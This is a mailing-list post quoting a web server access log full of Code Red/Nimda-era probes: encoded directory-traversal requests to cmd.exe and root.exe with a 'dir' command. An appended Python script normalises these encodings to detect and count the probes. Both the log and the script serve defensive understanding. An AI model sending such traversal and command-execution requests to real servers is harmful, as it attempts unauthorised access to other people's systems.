Hi List,

Four days my http server has been online and my access log looks like a war zone from the year 2000. I thought Code Red should have been gone by now.
Although it's nice to see what vulnerabilities are out there. For example:

24.117.53.121 - - [03/Feb/2004:10:30:21 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 289
24.117.53.121 - - [03/Feb/2004:10:30:21 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 287
24.117.53.121 - - [03/Feb/2004:10:30:21 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
24.117.53.121 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
24.117.53.121 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
24.117.53.121 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 301
24.117.53.121 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 301
24.117.53.121 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
24.117.53.121 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
How would one go about informing this person that they're completely hosed? Or is this just a script kiddie? Any thoughts?

Ted Katseres
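An added example, not part of the original post: a log triage sketch that collapses the encoded variants seen above (`%255c`, `%%35%63`, `%c0%af`, `%c1%1c`) into one normalised path, then counts per source address how many requests targeted `cmd.exe` or `root.exe` and whether any were answered with a 2xx status. The sample lines are constructed with documentation addresses, the function names are hypothetical, and the 0xC0/0xC1 folding is an assumption about how a lenient decoder would treat those bytes.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample (documentation IPs), modelled on the request shapes in the post.
SAMPLE = r'''192.0.2.10 - - [03/Feb/2004:10:30:21 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 289
192.0.2.10 - - [03/Feb/2004:10:30:22 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
192.0.2.10 - - [03/Feb/2004:10:30:22 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
192.0.2.10 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
192.0.2.10 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 301
198.51.100.7 - - [03/Feb/2004:10:31:02 -0600] "GET /index.html HTTP/1.0" 200 1024'''.splitlines()

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+')

def normalise(path, rounds=4):
    """Decode as a lenient server might, so every encoded variant collapses to one form."""
    raw = path.encode("utf-8")
    for _ in range(rounds):  # repeated decoding unwraps %255c, %%35%63, %25%35%63
        raw, prev = unquote_to_bytes(raw), raw
        if raw == prev:
            break
    # Assumption: fold 2-byte sequences led by 0xC0/0xC1 (overlong or malformed UTF-8).
    fold = lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)])
    raw = re.sub(rb"[\xc0\xc1](.)", fold, raw, flags=re.S)
    return raw.replace(b"\\", b"/").lower().decode("latin-1")

def classify(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    path = target.split("?", 1)[0]
    norm = normalise(path)
    probe = norm.rsplit("/", 1)[-1] in ("cmd.exe", "root.exe")
    encoded = "../" in norm and norm != path.lower()  # traversal hidden by encoding
    return {"ip": ip, "probe": probe, "encoded": encoded, "served": status.startswith("2")}

def summarise(lines):
    out = defaultdict(lambda: {"probes": 0, "encoded": 0, "served": 0})
    for rec in filter(None, map(classify, lines)):
        if rec["probe"]:
            s = out[rec["ip"]]
            s["probes"] += 1
            s["encoded"] += rec["encoded"]
            s["served"] += rec["served"]  # any non-zero value here needs follow-up
    return dict(out)

if __name__ == "__main__":
    print(summarise(SAMPLE))
```

A `served` count of zero, as with the 404 and 400 responses in the post, means the server answered none of these requests with a success status.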
